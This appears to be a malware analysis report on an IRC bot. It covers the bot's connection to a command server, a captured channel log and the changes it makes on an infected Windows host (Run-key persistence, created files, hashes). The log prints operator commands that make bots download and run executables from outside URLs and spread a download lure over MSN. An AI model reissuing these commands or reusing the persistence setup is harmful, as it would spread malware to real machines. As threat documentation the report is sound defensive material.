195.162.68.118 (botnet hosted with Navitel Rusconnect Ltd, Russian Federation)

Remote host: 195.162.68.118, port number: 7777

PASS google_x1[s7_4]rk-h.tmp

NICK {N}|USA|XP|COMPUTERNAME|192671
USER vsqcdz "" "lfjx" :COMPUTERNAME
JOIN #nonamefase
PRIVMSG #nonamefase :New Servant.

Now talking in #nonamefase
Modes On: [ #nonamefase ] [ +smntu ]
(niname) !wget http://www.rummagu.com/burnbuddy.exe
(niname) !wget http://shoponline.muji.fr/images/sss.exe
(niname) !wget http://www.rummagu.com/burnbuddy.exe
(niname) !!wget http://www.rummagu.com/burnbuddy.exe
(niname) !!wget http://www.rummagu.com/burnbuddy.exe
(niname) !wget http://www.rummagu.com/burnbuddy.exe
(niname) !msn Boot your pc now – http://www.zestbyte.com/pc-boost.exe
(niname) !wget http://www.rummagu.com/burnbuddy.exe
Quits: niname [no@anyfuck.I] (Ping timeout)
niname sets mode: +oaq niname niname niname

Registry Modifications

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Windows Live Guards = "%ProgramFiles%\winlogon.exe"
+ UserFaultCheck = "%System%\dumprep 0 -u"

so that winlogon.exe runs every time Windows starts
o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
+ Windows Live Guards = "%ProgramFiles%\winlogon.exe"

so that winlogon.exe runs every time Windows starts

* Notes:
o %AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.
o %ProgramFiles% is a variable that refers to the Program Files folder. A typical path is C:\Program Files.

* The following directories were created:
o c:\My Downloads
o %ProgramFiles%\KAZAA

File System Modifications

* The following files were created in the system (filename, file size, file hashes):

1. %AppData%\google_x1[s7_4]rk-h.tmp (9 bytes)
MD5: 0x6C936CB4A4B7F5803BD2E3DEACC3C2FE
SHA-1: 0x561782F6CC10BA3E5AFEAED752F95E589C813891

2. %AppData%\google__x1[s7_4]rk-h.tmp (9 bytes)
MD5: 0x1F4BBF969C0CDB4D145F47D3184D06D0
SHA-1: 0x66E3E41B2CD86E83D1F65484EC249F30F1C68046

3. %AppData%\phqghumeaylnlfdxfirc.exe (499,712 bytes)
MD5: 0x2332F2058880E9B243794F1AF146B87F
SHA-1: 0x860AD161531187027AE7FC8A66C7E6D1CA12A865

4. %ProgramFiles%\winlogon.exe [file and pathname of the sample #1] (102,400 bytes)
MD5: 0x806F308FE25491495A5158239D9D47D3
SHA-1: 0x7F3DC2936A31AA34D32AD37B11C9A6F9E60C6FC5

Hosting information:
http://whois.domaintools.com/195.162.68.118
